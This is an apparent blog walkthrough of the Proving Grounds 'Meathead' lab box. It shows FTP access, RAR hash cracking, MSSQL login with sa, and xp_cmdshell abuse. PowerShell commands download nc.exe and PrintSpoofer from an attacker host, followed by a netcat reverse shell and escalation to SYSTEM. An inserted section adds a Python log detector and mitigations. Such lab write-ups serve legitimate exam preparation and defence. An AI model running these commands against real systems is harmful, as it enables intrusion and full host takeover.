Proving grounds:Meathead

Al1z4deh:~# echo "Welcome"
Jan 10, 2023

Today we will take a look at Proving Grounds: Meathead. I am sharing this post as part of my preparation for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Plantronics
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20 07:02PM 18866 Elementum Supremum.docx
| 04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
| 04-27-20 07:02PM 15690 img.jpg
| 04-27-20 07:02PM 302 MSSQL_BAK.rar
| 04-27-20 07:02PM 548 palindromes.txt
|_04-27-20 07:02PM 45369 server.jpg
1435/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-09-20T08:08:01
|_Not valid after: 2052-09-20T08:08:01
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-01-10T13:25:20+00:00; -1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-01-10T13:25:20+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2022-08-27T05:05:45
|_Not valid after: 2023-02-26T05:05:45
| rdp-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
| Product_Version: 10.0.17763
|_ System_Time: 2023-01-10T13:24:45+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 1221 (ftp)

We can log in to FTP with the anonymous account.

└─$ ftp 192.168.68.70 1221
Connected to 192.168.68.70.
220 Microsoft FTP Service
Name (192.168.68.70:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49696|)
150 Opening ASCII mode data connection.
04-27-20 07:02PM 18866 Elementum Supremum.docx
04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
04-27-20 07:02PM 15690 img.jpg
04-27-20 07:02PM 302 MSSQL_BAK.rar
04-27-20 07:02PM 548 palindromes.txt
04-27-20 07:02PM 45369 server.jpg
226 Transfer complete.
ftp> mget MSSQL_BAK.rar
mget MSSQL_BAK.rar [anpqy?]? y
229 Entering Extended Passive Mode (|||49699|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************
226 Transfer complete.
  • rar2john

I can’t open the file because it’s encrypted. Extract the hash with rar2john.

rar2john MSSQL_BAK.rar > hash.txt

  • hashcat

Crack the hash with hashcat (mode 13000 is RAR5):

hashcat -a 0 -m 13000 hash.txt rockyou.txt

  • mssql

Extract the archive with the recovered password and read the backup note:

└─$ unrar e MSSQL_BAK.rar

└─$ cat mssql_backup.txt
Username: sa
Password: EjectFrailtyThorn425

The note holds the sa credentials for MSSQL, so connect with Impacket's mssqlclient (the service listens on the non-default port 1435):

└─$ impacket-mssqlclient sa:'EjectFrailtyThorn425'@192.168.68.70 -p 1435
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> show databases;
[-] ERROR(MEATHEAD\SQLEXPRESS): Line 1: Could not find stored procedure 'show'.
SQL> ls
[-] ERROR(MEATHEAD\SQLEXPRESS): Line 1: Could not find stored procedure 'ls'.
SQL> enable_xp_cmdshell
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------------------

nt service\mssql$sqlexpress

NULL
  • reverse shell
SQL> xp_cmdshell mkdir c:\temp
output

--------------------------------------------------------------------------------

NULL

SQL> xp_cmdshell powershell.exe -c "iwr http://192.168.49.68/nc.exe -OutFile C:\temp\nc.exe"
output

--------------------------------------------------------------------------------

NULL

SQL> xp_cmdshell C:\temp\nc.exe -e cmd.exe 192.168.xx.xx 139
output

--------------------------------------------------------------------------------

NULL
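Everything in the two sections above goes through xp_cmdshell: first the option is switched on with sp_configure, then SQL Server spawns cmd.exe on behalf of the sa login. Both steps leave footprints a defender can alert on. The following is an added example, not code from the original post: it runs two simple rules over constructed log lines. The first two lines mimic the "Configuration option 'xp_cmdshell' changed from 0 to 1" INFO messages seen above; the remaining lines are process-creation records in a simplified key=value form that is an assumption here (Sysmon or EDR output would need its own parser), and the file paths and user names in them are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample log (not from the original post). Lines 1-2 mirror the
# sp_configure INFO messages; lines 3-4 are simplified process-creation records.
SAMPLE_LOG = """\
2023-01-10 13:30:01 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-01-10 13:30:01 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-01-10 13:30:09 ProcessCreate ParentImage=C:\\Program Files\\Microsoft SQL Server\\MSSQL14.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe Image=C:\\Windows\\System32\\cmd.exe User=NT SERVICE\\MSSQL$SQLEXPRESS
2023-01-10 13:31:40 ProcessCreate ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe User=MEATHEAD\\admin
"""

# Rule 1: a server option that hands out OS command execution was enabled.
CONFIG_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
WATCHED_OPTIONS = {"xp_cmdshell", "ole automation procedures"}

# Rule 2: the database engine itself became the parent of a shell or interpreter.
PROC_RE = re.compile(
    r"ProcessCreate ParentImage=(?P<parent>.+?) Image=(?P<image>.+?) User=(?P<user>.+)$"
)
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


@dataclass
class Alert:
    rule: str
    line_no: int
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def scan(lines) -> list:
    """Apply both rules to an iterable of log lines and return the alerts raised."""
    alerts = []
    for line_no, line in enumerate(lines, 1):
        m = CONFIG_RE.search(line)
        if m and m["option"].lower() in WATCHED_OPTIONS and m["new"] != "0":
            alerts.append(Alert("mssql-dangerous-option-enabled", line_no,
                                f"{m['option']} {m['old']}->{m['new']}"))
            continue
        m = PROC_RE.search(line)
        if m and basename(m["parent"]) == "sqlservr.exe" and basename(m["image"]) in SHELL_IMAGES:
            alerts.append(Alert("mssql-spawned-shell", line_no,
                                f"{basename(m['image'])} as {m['user']}"))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(f"line {alert.line_no}: [{alert.rule}] {alert.detail}")
```

The first rule fires on the configuration change regardless of who made it, which matters because a legitimate DBA flipping xp_cmdshell on should be just as visible as an attacker doing it. The second rule is the more robust one: sqlservr.exe has no business being the parent of cmd.exe or powershell.exe, so that parent-child pair is a strong signal even when the option was enabled long before logging started. On the mitigation side the same observation applies in reverse: keep xp_cmdshell disabled, and never let an application log in as sa.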
  • privesc (PrintSpoofer)
C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
=========================== ===============================================================
nt service\mssql$sqlexpress S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT SERVICE\ALL SERVICES Well-known group S-1-5-80-0 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

ERROR: Unable to get user claims information.

C:\Windows\system32>systeminfo
systeminfo

Host Name: MEATHEAD
OS Name: Microsoft Windows Server 2019 Standard
SeImpersonatePrivilege is enabled and the host is Windows Server 2019 Standard, so PrintSpoofer.exe applies.
C:\temp>powershell.exe -c "iwr http://192.168.xx.xx/PrintSpoofer.exe -OutFile C:\temp\PrintSpoofer.exe"

C:\temp>cmd.exe /c //192.168.xx.xx/smbfolder/PrintSpoofer.exe -i -c cmd.exe
cmd.exe /c //192.168.49.68/smbfolder/PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.1217]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

And now we are SYSTEM.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
